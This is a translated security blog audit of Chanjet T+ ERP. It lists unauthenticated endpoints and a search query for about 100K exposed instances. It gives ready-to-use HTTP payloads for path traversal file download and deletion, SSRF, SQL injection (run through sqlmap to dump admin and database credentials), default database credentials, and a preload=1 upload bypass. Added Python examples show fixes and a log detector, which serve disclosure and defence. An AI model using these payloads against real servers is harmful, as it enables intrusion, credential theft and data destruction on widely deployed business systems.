Chanjet (畅捷通) T+ Plus Audit (Very Detailed)

admin, 2024-10-20 00:47:11

0x00 Preface

FOFA: app="畅捷通-TPlus"           exposed instances: about 100K


Chanjet T+ ships a very complete set of Ajax interfaces, but most of them can be called without any authentication, which is where many of the bugs below come from. The table lists every Ajax interface, the class that implements it, and the product version it belongs to.

No. | Endpoint | Class | Version
1 | ReportApi | Ufida.T.BAP.Web.Report.ReportApi,Ufida.T.BAP.Web | 12.3
2 | VoucherApi | Ufida.T.BAP.Web.Voucher.VoucherApi,Ufida.T.BAP.Web | 12.3
3 | OperationApi | Ufida.T.EAP.Privilege.UIP.OperationApiController,Ufida.T.EAP.Privilege.UIP | 12.3
4 | CloudApi | Ufida.T.MB.Controller.AuthConfigRestCtrl,Ufida.T.MB.Controller | 12.3
5 | RefInfo | Ufida.EAP.ReferInfos.Migrate.Controller.ReferInfoController,Ufida.EAP.ReferInfos.Migrate.Controller | 12.3
6 | UiConfig | Ufida.EAP.ReferInfos.Migrate.Controller.UiConfigController,Ufida.EAP.ReferInfos.Migrate.Controller | 12.3
7 | UserGroup | Ufida.T.EAP.Privilege.UIP.controller.UserGroupController,Ufida.T.EAP.Privilege.UIP | 12.3
8 | User | Ufida.T.EAP.Privilege.UIP.controller.UserController,Ufida.T.EAP.Privilege.UIP | 12.3
9 | previewaccount | Ufida.T.SM.UIP.UA.PreviewAccountController,Ufida.T.SM.UIP | 12.3
10 | report | Ufida.T.BAP.Web.Report.ReportApi,Ufida.T.BAP.Web.Report | 12.3
11 | search | Ufida.T.EAP.QueryExt.UIP.SearchApiController,Ufida.T.EAP.QueryExt.UIP | 12.3
12 | VisitPlanApi | Ufida.T.CM.UIP.VisitPlanApiController,Ufida.T.CM.UIP | 12.3
13 | CMApi | Ufida.T.CM.UIP.CMApiController,Ufida.T.CM.UIP | 12.3
14 | VisitPhoto | Ufida.T.CM.UIP.VisitPhotoController,Ufida.T.CM.UIP | 12.3
15 | mbreportpublish | Ufida.T.EAP.Privilege.UIP.controller.MBReportController,Ufida.T.EAP.Privilege.UIP | 12.3
16 | RestToken | Ufida.T.SM.Login.UIP.controller.RestTokenController,Ufida.T.SM.Login.UIP | 12.3
17 | CustomLogo | Ufida.T.SM.UIP.CustomLogo.CustomLogoController,Ufida.T.SM.UIP | 12.3
18 | TraceGraphicalApi | Chanjet.T.TXH.Base.TraceGraphicalController,Chanjet.T.TXH.Base | 12.3
19 | UserInfo | Ufida.T.SM.Login.UIP.controller.UserInfoController,Ufida.T.SM.Login.UIP | 12.3
20 | Password | Ufida.T.SM.Login.UIP.controller.PasswordController,Ufida.T.SM.Login.UIP | 12.3
21 | PhoneEmail | Ufida.T.SM.Login.UIP.controller.PhoneEmailController,Ufida.T.SM.Login.UIP | 12.3
22 | multicompclass | Ufida.T.SM.UIP.MultiCompany.MultiCompanyClassController,Ufida.T.SM.UIP | 12.3
23 | multicompclassmap | Ufida.T.SM.UIP.MultiCompany.MultiCompanyClassMapController,Ufida.T.SM.UIP | 12.3
24 | multicompclassaccount | Ufida.T.SM.UIP.MultiCompany.AccountController,Ufida.T.SM.UIP | 12.3
25 | PrintApi | Ufida.T.EAP.Print.Controller.CloudPrint.CloudPrintController,Ufida.T.EAP.Print.Controller | 12.3
26 | VoucherSearch | Ufida.T.EAP.Portal.UIP.VoucherSearchController,Ufida.T.EAP.Portal.UIP | 12.3
27 | GLAI | Ufida.T.GL.UIP.AI.DataCheckController,Ufida.T.GL.UIP | 12.3
28 | GLDS | Ufida.T.GL.UIP.GLDoc.GLCommonWebApi,Ufida.T.GL.UIP | 12.3
29 | tenant | Ufida.T.SM.TenantInfo.Controller.TenantInfoController,Ufida.T.SM.TenantInfo.Controller | 13
30 | verifycode | Ufida.T.EAP.Privilege.UIP.controller.VerifyCodeController,Ufida.T.EAP.Privilege.UIP | 13
31 | UpgradeTime | Ufida.T.EAP.Portal.UIP.UpgradeTimeController,Ufida.T.EAP.Portal.UIP | 12.3
32 | RapScript | Ufida.T.DT.UIP.Import.RapScriptController,Ufida.T.DT.UIP | 13
33 | Attachment | Ufida.T.EAP.VoucherExt.Controller.AttachmentController,Ufida.T.EAP.VoucherExt.Controller | 13
34 | InventoryImage | Ufida.T.EAP.FileHandle.Controller.InventoryImageController,Ufida.T.EAP.FileHandle.Controller | 13
35 | SRTemplateApi | Ufida.T.SR.SmartReport.UIP.SRTemplateApi,Ufida.T.SR.SmartReport.UIP | 12.3
36 | OperationLog | Ufida.T.SM.UIP.WebApi.OperationLogController,Ufida.T.SM.UIP | 13
37 | AuthCode | Ufida.T.SM.UIP.WebApi.AuthCodeController,Ufida.T.SM.UIP | 13
38 | FollowUpInfo | Ufida.T.CM.UIP.FollowUpInfoController,Ufida.T.CM.UIP | 13
39 | VoucherControlPlan | Ufida.T.CM.UIP.VoucherControlPlanController,Ufida.T.CM.UIP | 13
40 | OptionSettingApi | Ufida.T.SM.UIP.WebApi.OptionSettingApiController,Ufida.T.SM.UIP | 13
41 | SmApi | Ufida.T.SM.UIP.WebApi.SmApiController,Ufida.T.SM.UIP | 13
42 | OrderSysncSetting | Ufida.T.RE.UIP.OrderSysncSettingController,Ufida.T.RE.UIP | 13
43 | dstnewapi | Chanjet.T.ES.UIP.NewDST.DSTNewAPI,Chanjet.T.ES.UIP | 13
44 | rchkApi | Ufida.T.RCHK.UIP.RCHKReportController,Ufida.T.RCHK.UIP | 13
46 | patch | Ufida.T.SM.PublishService.Controller.PublishController,Ufida.T.SM.PublishService.Controller | 13
47 | SCMMiniProgram | Chanjet.T.MiniProgram.UIP.MiniProgramController,Chanjet.T.MiniProgram.UIP | 13
48 | ElebalanceApi | chanjet.T.Elebalance.UIP.ElebalanceApiController,chanjet.T.Elebalance.UIP | 13
49 | DataUploadApi | Ufida.T.SM.DataUpload.UIP.DataUploadApi,Ufida.T.SM.DataUpload.UIP | 15
50 | SRToolsAPi | Ufida.T.SR.SmartReport.UIP.SRToolsAPi,Ufida.T.SR.SmartReport.UIP | 12.3
51 | TaxCheckApi | Ufida.T.GL.UIP.TaxCheck.TaxCheckApi,Ufida.T.GL.UIP | 13
52 | WMSApi | Chanjet.T.WMS.UIP.TCWMSController,Chanjet.T.WMS.UIP | 15
53 | UploadJDWms | Ufida.T.AA.UIP.UploadJDWmsController,Ufida.T.AA.UIP | 15
54 | RdsAccount | Ufida.T.SM.UIP.WebApi.RdsAccountController,Ufida.T.SM.UIP | 15
55 | AllTaxDeclareApi | Ufida.T.SR.SmartReport.UIP.AllTaxDeclareApi,Ufida.T.SR.SmartReport.UIP | 13
56 | DevVouMsgSetApi | Ufida.T.SM.UIP.MessageCenter.DevVoucherMessageSetController,Ufida.T.SM.UIP | 15
57 | SelfOperation | Ufida.T.EAP.Portal.UIP.SelfOperationController,Ufida.T.EAP.Portal.UIP | 15
58 | BoardApi | Ufida.T.SM.UIP.WebApi.BoardController,Ufida.T.SM.UIP | 15
59 | isvauth | Ufida.T.SM.UIP.ISV.ISVAuthController,Ufida.T.SM.UIP | 15
60 | GoalAssignApi | Ufida.T.CPM.UIP.GoalAssignEditController,Ufida.T.CPM.UIP | 15
61 | CPMReportApi | Ufida.T.CPM.UIP.CPMReportApi,Ufida.T.CPM.UIP | 15
62 | CarryForwardApi | Ufida.T.SM.UIP.WebApi.CarryForwardController,Ufida.T.SM.UIP | 15
63 | EaApi | Ufida.T.EAP.EA.UIP.EAController,Ufida.T.EAP.EA.UIP | 15
64 | Backup2OssSetApi | Ufida.T.SM.UIP.Backup2OssSetController,Ufida.T.SM.UIP | 15
65 | PlugApi | Ufida.T.EAP.AppStore.UIP.PlugInfoController,Ufida.T.EAP.AppStore.UIP | 16
66 | PortalApi | Ufida.T.EAP.Portal.UIP.PortalController,Ufida.T.EAP.Portal.UIP | 16
67 | TopAppApi | Ufida.T.SM.UIP.WebApi.TopAppController,Ufida.T.SM.UIP | 16
68 | SAVoucherShare | Ufida.T.SA.UIP.SAVoucherShareController,Ufida.T.SA.UIP | 16
69 | AccountingCalcApi | Ufida.T.GL.UIP.Tool.AccountingCalcApi,Ufida.T.GL.UIP | 15
70 | HeighPictureApi | Ufida.T.GL.UIP.AI.HeighPictureApiController,Ufida.T.GL.UIP | 16
71 | SyncTplusDataToCC | Ufida.T.AA.UIP.SyncTplusDataController,Ufida.T.AA.UIP | 16
72 | BCNewRetailApi | Ufida.T.RE.UIP.BCNewRetailController,Ufida.T.RE.UIP | 16
73 | login | Ufida.T.SM.Login.UIP.controller.LoginController,Ufida.T.SM.Login.UIP | 16
74 | FactoryCalendarApi | Ufida.T.AA.UIP.FactoryCalendarApiController,Ufida.T.AA.UIP | 16
75 | BatchProcessDispatchApi | Ufida.T.SW.UIP.BatchProcessDispatchApiController,Ufida.T.SW.UIP | 16
76 | ProcessDispatchWorkbenchApi | Ufida.T.SW.UIP.ProcessDispatchWorkbenchApiController,Ufida.T.SW.UIP | 16
77 | XCBXApi | Ufida.T.CS.UIP.XCBXController,Ufida.T.CS.UIP | 16
78 | taskApi | Ufida.T.SM.UIP.WebApi.TaskApiController,Ufida.T.SM.UIP | 16
79 | TaskService | Ufida.T.EAP.Privilege.UIP.controller.TasServiceController,Ufida.T.EAP.Privilege.UIP | 16
80 | MPApi | Ufida.T.MP.UIP.MPApiController,Ufida.T.MP.UIP | 16
81 | SMRetailApi | Ufida.T.SM.UIP.WebApi.SMRetailController,Ufida.T.SM.UIP | 16
82 | LMApi | Ufida.T.LM.UIP.LMApiController,Ufida.T.LM.UIP | 16
83 | TMSApi | Ufida.T.LM.UIP.TMSController,Ufida.T.LM.UIP | 16

0x01 Unauthenticated arbitrary file download + deletion

/tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx: decompiling the related DLL shows that the page takes a caller-supplied fileName parameter.


Reading through the code, the handler first sends the file named by fileName from the TemplatesWMSUploadLog directory to the client and then deletes it. The name is joined onto the directory without any containment check, so ../ escapes the directory.


Payload:

http://127.0.0.1/tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx?fileName=../../aaaa.txt

0x02 Unauthenticated information disclosure

The class Ufida.T.SM.UIP.Tool.AccountClearControler is reachable without authorization and discloses a server-side filesystem path.


Payload: 

/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetDefaultBackPath


0x03 Unauthenticated SSRF

The class Ufida.T.SM.UIP.UA.AddressSettingController exposes a TestConnnect function that calls the CheckConnnect method shown in the second screenshot; the server connects to whatever address the caller supplies, giving an unauthenticated SSRF.


Payload:

POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 56
Content-Type: application/json
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

{  "address":"xxxxxx.dnslog.cn"}
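TestConnnect is an outbound "test this address" feature with no restriction on the destination. The following Python is an added example, not code from the write-up or from Chanjet: the destination check such a feature should run before it opens a connection. It extracts only the host part of the input, requires the host to be on an administrator-maintained allow-list, resolves it, and refuses anything that resolves to a non-public address. The allow-list names and the stub resolver used in the test are constructed for the example.

```python
import ipaddress
import socket
from typing import Callable, Iterable, List, Tuple
from urllib.parse import urlsplit

# Hosts an administrator has explicitly approved for the connection test.
# Constructed names for this example; in practice this list lives in
# configuration, not in code.
ALLOWED_HOSTS = {"erp-gateway.example.com", "internal.example.com"}

Resolver = Callable[[str], Iterable[str]]


def default_resolver(host: str) -> List[str]:
    """All A/AAAA answers for host from the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: str) -> bool:
    """True only for globally routable addresses: loopback, RFC 1918,
    link-local, unique-local, multicast and reserved ranges all fail."""
    return ipaddress.ip_address(ip).is_global


def check_address(address: str,
                  allowed_hosts: Iterable[str] = ALLOWED_HOSTS,
                  resolve: Resolver = default_resolver) -> Tuple[bool, str]:
    """Decide whether a caller-supplied address may be contacted.

    Accepts a bare host, host:port or a full URL; only the host part is
    considered. Returns (allowed, reason). The default is deny: a host that
    is not on the allow-list, or that resolves to any non-public address,
    is refused.
    """
    raw = address.strip()
    try:
        # urlsplit only sees a host when a scheme or a leading // is present.
        host = urlsplit(raw if "://" in raw else "//" + raw).hostname
    except ValueError:
        return False, "unparseable address"
    if not host:
        return False, "no host"
    if host.lower().rstrip(".") not in {h.lower() for h in allowed_hosts}:
        return False, "host not on allow-list"
    try:
        ips = list(resolve(host))
    except (socket.gaierror, OSError):
        return False, "resolution failed"
    if not ips:
        return False, "host has no addresses"
    # An allow-listed name can still point at an internal address (a stale
    # record, or a name the administrator did not expect to be internal).
    for ip in ips:
        if not is_public_address(ip):
            return False, f"resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("erp-gateway.example.com", "127.0.0.1", "xxxxxx.dnslog.cn"):
        print(candidate, check_address(candidate))
```

Whatever passes this check should then be connected to using the resolved address, not by resolving the name a second time, otherwise a record that changes between check and connect defeats the check.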


0x04 Unauthenticated arbitrary file deletion

The class Ufida.T.EAP.Voucher.WebController.AjaxImageService exposes a DeleteSingleImage function that calls the DeleTempImage method shown below, resulting in arbitrary file deletion.


Inspection shows the deletion is performed under /UserImages; ../ in the supplied name walks out of that directory. Payload:

POST /tplus/ajaxpro/Ufida.T.EAP.Voucher.WebController.AjaxImageService,Ufida.T.EAP.Voucher.WebController.ashx?method=DeleteSingleImage HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 50
Content-Type: application/json
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.EAP.Voucher.WebController.AjaxImageService,Ufida.T.EAP.Voucher.WebController.ashx?method=DeleteSingleImage
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

{  "fileName":"../aaa.jpg"}
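The handlers in 0x01 and 0x04 fail for the same reason: a caller-supplied fileName is joined onto a fixed directory (TemplatesWMSUploadLog, /UserImages) and used without checking that the result is still inside that directory. The Python below is an added example, not code from the write-up or from Chanjet, showing the containment check a fixed handler needs, wired into the download-then-delete flow described in 0x01. The base directory names are constructed for the demo; the check itself is generic.

```python
import os
import tempfile
from typing import Optional


def resolve_inside(base_dir: str, user_supplied: str) -> Optional[str]:
    """Return the canonical path of user_supplied under base_dir, or None.

    Two independent checks: the name must be a bare file name (no separator
    of either flavour, since IIS runs on Windows; no NUL; not '.' or '..'),
    and the canonicalised result must still have base_dir as its prefix.
    The second check also covers symlinks inside base_dir pointing outside.
    """
    if not user_supplied or user_supplied in (".", ".."):
        return None
    if any(ch in user_supplied for ch in ("/", "\\", "\x00")):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_supplied))
    # commonpath compares whole path components, so /UserImages2 does not
    # pass as "inside" /UserImages the way a string prefix test would.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def download_then_delete(base_dir: str, file_name: str) -> Optional[bytes]:
    """Hardened form of the 0x01 flow: read the file, remove it, return the
    bytes. None when the name is rejected or the file does not exist."""
    path = resolve_inside(base_dir, file_name)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as fh:
        data = fh.read()
    os.remove(path)
    return data


def demo() -> dict:
    """Exercise the check against a constructed temporary directory tree."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        log_dir = os.path.join(tmp, "WMSUploadLog")      # constructed stand-in
        os.mkdir(log_dir)
        with open(os.path.join(log_dir, "upload-20241020.log"), "wb") as fh:
            fh.write(b"constructed log content")
        # A sibling file outside the allowed directory that must survive.
        with open(os.path.join(tmp, "web.config"), "wb") as fh:
            fh.write(b"constructed secret")
        results["legit"] = download_then_delete(log_dir, "upload-20241020.log")
        results["legit_gone"] = not os.path.exists(os.path.join(log_dir, "upload-20241020.log"))
        results["traversal"] = download_then_delete(log_dir, "../web.config")
        results["backslash"] = download_then_delete(log_dir, "..\\web.config")
        results["dotdot"] = download_then_delete(log_dir, "..")
        results["sibling_intact"] = os.path.exists(os.path.join(tmp, "web.config"))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The first check alone would be enough for a handler that only ever serves flat file names; the second is kept so that a later change (sub-directories, user-created links) cannot silently reopen the hole.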


0x05 Unauthenticated SQL injection

Default database credentials: TPlusDBAdmin|tplus_12345 (stored Base64-encoded)

The CheckPassword method of Ufida.T.SM.Login.UIP.LoginManager builds and runs a SQL query from its parameters with no filtering at all, which is what produces the injection.


Payload (feed it to sqlmap as-is):

POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 346
Content-Type: application/json
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

{
  "AccountNum":"*",
  "UserName":"admin",
  "Password":"e10adc3949ba59abbe56e057f20f883e",
  "rdpYear":"2022",
  "rdpMonth":"2",
  "rdpDate":"21",
  "webServiceProcessID":"admin",
  "ali_csessionid":"",
  "ali_sig":"",
  "ali_token":"",
  "ali_scene":"",
  "role":"",
  "aqdKey":"",
  "formWhere":"browser",
  "cardNo":""
}


A small tip for SQL injection against Chanjet:

Run --sql-shell first, then query directly: select * from eap_configpath


That returns the administrator credentials together with the database credentials.
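The root cause in CheckPassword is SQL assembled by string concatenation. As an added illustration, not the product's code, the block below writes the same credential lookup both ways against an in-memory SQLite table and shows that only the parameterised form is indifferent to quote characters in its input. T+ runs on SQL Server, but the parameterisation principle is the same; the table layout, account values and hash are constructed for the example.

```python
import hashlib
import sqlite3

# Constructed credential for the demo table; a real deployment stores a
# salted password hash, never an MD5 as the payload above suggests.
GOOD_HASH = hashlib.sha256(b"constructed-secret").hexdigest()


def build_db() -> sqlite3.Connection:
    """Create a one-row users table standing in for the login store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (account_num TEXT, user_name TEXT, password_hash TEXT)"
    )
    conn.execute("INSERT INTO users VALUES ('001', 'admin', ?)", (GOOD_HASH,))
    conn.commit()
    return conn


def check_password_concat(conn: sqlite3.Connection, account_num: str,
                          user_name: str, password_hash: str) -> bool:
    """Vulnerable: the pattern described for LoginManager.CheckPassword.
    Every argument is pasted straight into the statement text, so a quote
    in any of them changes the query's structure."""
    sql = ("SELECT count(*) FROM users WHERE account_num = '" + account_num
           + "' AND user_name = '" + user_name
           + "' AND password_hash = '" + password_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


def check_password_param(conn: sqlite3.Connection, account_num: str,
                         user_name: str, password_hash: str) -> bool:
    """Fixed: the statement text is constant and the values travel as bound
    parameters, so the database never parses user input as SQL."""
    sql = ("SELECT count(*) FROM users WHERE account_num = ? "
           "AND user_name = ? AND password_hash = ?")
    return conn.execute(sql, (account_num, user_name, password_hash)).fetchone()[0] > 0


def demo() -> dict:
    """Run a valid login and a quote-bearing account number through both."""
    conn = build_db()
    quoted = "' OR 1=1 --"   # a value containing SQL syntax, not a credential
    return {
        "concat_valid": check_password_concat(conn, "001", "admin", GOOD_HASH),
        "concat_quoted": check_password_concat(conn, quoted, "admin", "not-a-hash"),
        "param_valid": check_password_param(conn, "001", "admin", GOOD_HASH),
        "param_quoted": check_password_param(conn, quoted, "admin", "not-a-hash"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The concatenated version accepts the quote-bearing account number with a wrong hash because the input rewrote the WHERE clause; the parameterised version simply finds no such account.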


0x06 Authenticated arbitrary file upload

/tplus/CommonPage/UserFileUpload.aspx contains an UploadUserFile function that allows an authenticated user to upload a file of any type (on versions up to and including v17 the authentication check can be bypassed with ?preload=1).


Payload:

POST /tplus/CommonPage/UserFileUpload.aspx HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 775
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXNLGZirKX5UAvYG
Cookie: LOGIN_LANG=cn; ASP.NET_SessionId=oafhmiapxpe5vqesdwm4oms5; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1674191380,1674378083,1674393050,1674536169; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1674543095
Host: 127.0.0.0
Origin: http://127.0.0.0
Pragma: no-cache
Referer: http://127.0.0.0/tplus/CommonPage/UserFileUpload.aspx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

----WebKitFormBoundaryMXNLGZirKX5UAvYG
Content-Disposition: form-data; name="file";filename="Deep.txt"
Content-Type: image/jpeg

Hello Hack
----WebKitFormBoundaryMXNLGZirKX5UAvYG-
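Every request in sections 0x01 to 0x06 leaves a line in the IIS access log, even where the decisive parameter travels in a POST body that the log does not record. The Python below is an added example, not from the write-up or the vendor: a detection pass over a constructed IIS W3C log excerpt that flags traversal sequences in query strings (0x01), calls to the pre-auth ajaxpro methods named above (0x02 to 0x04), the ?preload=1 upload bypass (0x06), and bursts of CheckPassword calls from a single client, the footprint of running the 0x05 payload through sqlmap. The log lines, client addresses and burst threshold are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# Constructed IIS W3C extended log excerpt; not from a real T+ server.
# IIS replaces spaces inside a field with '+', so whitespace splitting is safe.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-10-20 00:47:11 10.0.0.5 GET /tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx fileName=../../web.config 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:12 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx method=TestConnnect 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:13 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.EAP.Voucher.WebController.AjaxImageService,Ufida.T.EAP.Voucher.WebController.ashx method=DeleteSingleImage 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:14 10.0.0.5 GET /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx method=GetDefaultBackPath 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:15 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx method=CheckPassword 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:15 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx method=CheckPassword 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:16 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx method=CheckPassword 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 00:47:20 10.0.0.5 POST /tplus/CommonPage/UserFileUpload.aspx preload=1 80 - 198.51.100.7 Mozilla/5.0 200
2024-10-20 09:12:01 10.0.0.5 GET /tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx fileName=upload-20241020.log 80 - 10.0.0.23 Mozilla/5.0 200
2024-10-20 09:12:05 10.0.0.5 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx method=CheckPassword 80 - 10.0.0.23 Mozilla/5.0 200
"""

# Pre-auth ajaxpro methods from this write-up that no browser session on the
# login page has a reason to call.
WATCHED_METHODS = {"TestConnnect", "DeleteSingleImage", "GetDefaultBackPath"}
# CheckPassword calls per client before it counts as a burst (constructed).
BURST_THRESHOLD = 3
# '..' as a whole path component, with either separator, after decoding.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def parse_w3c(text: str):
    """Yield (line_no, {field: value}) for each data line, using the layout
    declared by the most recent #Fields directive."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; a production parser would report it
        yield lineno, dict(zip(fields, parts))


def detect(text: str) -> list:
    """Return (line_no, rule, detail) alerts; line_no 0 marks an aggregate."""
    alerts = []
    checkpw_by_ip = defaultdict(int)
    for lineno, rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        query = "" if rec["cs-uri-query"] == "-" else rec["cs-uri-query"]
        params = dict(parse_qsl(query, keep_blank_values=True))
        # Rule 1: traversal in any query value (decoded twice to catch %252e).
        for key, value in params.items():
            decoded = unquote(unquote(value))
            if TRAVERSAL.search(decoded):
                alerts.append((lineno, "path-traversal", f"{key}={decoded}"))
        # Rule 2: pre-auth ajaxpro methods. Body parameters (fileName in
        # DeleteSingleImage, address in TestConnnect) are not logged, so the
        # method name is the only handle the access log gives us.
        method = params.get("method")
        if "/tplus/ajaxpro/" in stem and method in WATCHED_METHODS:
            alerts.append((lineno, "preauth-ajaxpro-method", method))
        # Rule 3: the preload query flag on the upload page.
        if stem.endswith("/tplus/commonpage/userfileupload.aspx") and params.get("preload") == "1":
            alerts.append((lineno, "upload-preload-bypass", rec["c-ip"]))
        # Rule 4: count CheckPassword per client for the burst rule below.
        if method == "CheckPassword":
            checkpw_by_ip[rec["c-ip"]] += 1
    for ip, count in checkpw_by_ip.items():
        if count >= BURST_THRESHOLD:
            alerts.append((0, "checkpassword-burst", f"{ip} x{count}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Rule 4 is the noisy one on a busy server: in practice the count is taken per time window, and the threshold is tuned against normal login volume before the rule is allowed to page anyone.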


Disclaimer: the programs and methods in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this public account accept none.

Originally published on the WeChat public account 星悦安全: 畅捷通T+ Plus 审计 (超详细)

Mirror: https://cn-sec.com/archives/1865353.html (CN-SEC中文网)